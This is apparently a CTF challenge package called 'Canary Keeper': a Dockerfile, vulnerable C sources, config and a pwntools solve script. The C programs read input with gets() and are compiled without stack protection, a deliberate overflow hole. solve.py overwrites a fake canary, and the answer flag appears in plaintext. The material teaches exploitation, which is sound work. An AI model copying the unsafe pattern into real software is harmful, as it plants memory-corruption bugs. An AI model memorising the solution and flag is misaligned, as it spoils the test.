Binex/canary keeper 0

canary-keeper-0/Dockerfile

@@ -0,0 +1,31 @@
+FROM --platform=linux/amd64 ubuntu@sha256:86ac87f73641c920fb42cc9612d4fb57b5626b56ea2a19b894d0673fd5b4f2e9 AS build
+
+RUN apt-get update -y && apt-get install -y gcc wget && rm -rf /var/lib/apt/lists/*
+
+RUN wget -O ynetd.c \
+        https://raw.githubusercontent.com/johnsonjh/ynetd/e6fd08f8f5d0c6b8c18d645957e30ce012536ed4/ynetd.c \
+    && echo "ec7509dec7737da54f8b18e1b5ba935d657f9f016c36cfc9ac08f9952373226f  ynetd.c" | sha256sum -c \
+    && gcc -o ynetd ynetd.c
+
+COPY chall.c .
+RUN gcc -o chall  -fno-stack-protector chall.c
+
+COPY provided.c .
+RUN gcc -o provided -fno-stack-protector provided.c
+
+FROM --platform=linux/amd64 ubuntu@sha256:86ac87f73641c920fb42cc9612d4fb57b5626b56ea2a19b894d0673fd5b4f2e9
+
+RUN useradd -m -d /home/ctf -u 12345 ctf
+WORKDIR /home/ctf
+
+COPY --from=build ynetd ynetd
+RUN chmod +x ynetd
+
+COPY --from=build chall chall
+COPY --from=build provided provided
+
+RUN chown -R root:root /home/ctf
+
+USER ctf
+EXPOSE 9999
+CMD ./ynetd -p 9999 ./chall

canary-keeper-0/chall.c

@@ -0,0 +1,40 @@
+#include <string.h>
+#include <stdio.h>
+
+#define CANARY_VALUE "canary\0"
+#define FLAG_VALUE "bcactf{s1mple_CANaRY_9b36bd9f3fd2f}\0"
+
+int check_canary(const char* canary) {
+    return strcmp(canary, CANARY_VALUE) == 0;
+}
+
+int check_flag(const char* flag) {
+    return strcmp(flag, FLAG_VALUE) == 0;
+}
+
+int main() {
+    setbuf(stdout, NULL);
+    setbuf(stdin, NULL);
+    setbuf(stderr, NULL);
+
+    char flag[64] = FLAG_VALUE;
+    char canary[7] = CANARY_VALUE;
+    char buffer[64];
+
+    printf("Enter a string: ");
+    gets(buffer);
+
+    if (!check_canary(canary)) {
+        printf("Buffer overflow detected!\n");
+        return 1;
+    }
+
+    if (check_flag(flag)) {
+        printf("No changes in flag detected!\n");
+        return 1;
+    }
+
+    printf("Flag: %s\n", FLAG_VALUE);
+
+    return 0;
+}

canary-keeper-0/chall.yaml

@@ -0,0 +1,19 @@
+name: Canary Keeper
+categories:
+  - binex
+value: 100
+flag: bcactf{s1mple_CANaRY_9b36bd9f3fd2f}
+description: |-
+  My friend gave me this executable, but it keeps giving me errors.
+  Can you get the flag?
+hints: []
+files:
+  - src: /provided
+    container: nc
+deploy:
+  nc:
+    build: .
+    expose: 9999/tcp
+authors:
+  - Jack
+visible: true

canary-keeper-0/provided.c

@@ -0,0 +1,36 @@
+#include <string.h>
+#include <stdio.h>
+
+#define CANARY_VALUE "canary\0"
+#define FLAG_VALUE "FLAG\0"
+
+int check_canary(const char* canary) {
+    return strcmp(canary, CANARY_VALUE) == 0;
+}
+
+int check_flag(const char* flag) {
+    return strcmp(flag, FLAG_VALUE) == 0;
+}
+
+int main() {
+    char flag[64] = FLAG_VALUE;
+    char canary[7] = CANARY_VALUE;
+    char buffer[64];
+
+    printf("Enter a string: ");
+    gets(buffer);
+
+    if (!check_canary(canary)) {
+        printf("Buffer overflow detected!\n");
+        return 1;
+    }
+
+    if (check_flag(flag)) {
+        printf("No changes in flag detected!\n");
+        return 1;
+    }
+
+    printf("Flag: %s\n", FLAG_VALUE);
+
+    return 0;
+}

canary-keeper-0/solve.py

@@ -0,0 +1,7 @@
+from pwn import *
+
+p = process('./provided')
+
+p.sendline(b'A'*73+b'canary\0'+b'test')
+flag = p.recvall()
+print(flag.decode())